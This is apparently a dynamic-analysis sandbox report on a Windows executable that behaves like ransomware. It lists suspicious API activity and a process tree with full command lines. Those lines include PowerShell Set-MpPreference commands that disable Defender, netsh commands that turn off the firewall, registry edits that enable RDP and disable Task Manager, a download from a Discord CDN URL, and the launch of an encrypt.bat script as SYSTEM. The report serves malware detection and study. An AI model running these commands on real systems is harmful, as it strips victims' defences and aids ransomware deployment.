Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 716 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe
PID 716 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe
PID 1324 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1324 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1324 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe C:\Windows\SYSTEM32\netsh.exe
PID 1324 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe C:\Windows\SYSTEM32\netsh.exe
PID 1324 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe C:\Windows\SYSTEM32\runas.exe
PID 1324 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe C:\Windows\SYSTEM32\runas.exe
PID 1324 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1324 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 3676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 3676 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1324 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe C:\Windows\system32\cmd.exe
PID 1324 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe C:\Windows\system32\cmd.exe
PID 2920 wrote to memory of 3468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2920 wrote to memory of 3468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 1604 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 4080 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 4080 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 5108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 5108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 5108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 5108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 5108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4616 wrote to memory of 5108 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe

"C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe"

C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe

"C:\Users\Admin\AppData\Local\Temp\a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\SYSTEM32\runas.exe

runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa185046f8,0x7ffa18504708,0x7ffa18504718

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,2550070480749187065,9792735792829269381,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,2550070480749187065,9792735792829269381,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,2550070480749187065,9792735792829269381,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2550070480749187065,9792735792829269381,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2550070480749187065,9792735792829269381,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,2550070480749187065,9792735792829269381,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5148 /prefetch:8

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,2550070480749187065,9792735792829269381,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5148 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2550070480749187065,9792735792829269381,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2550070480749187065,9792735792829269381,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:1

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2550070480749187065,9792735792829269381,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,2550070480749187065,9792735792829269381,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

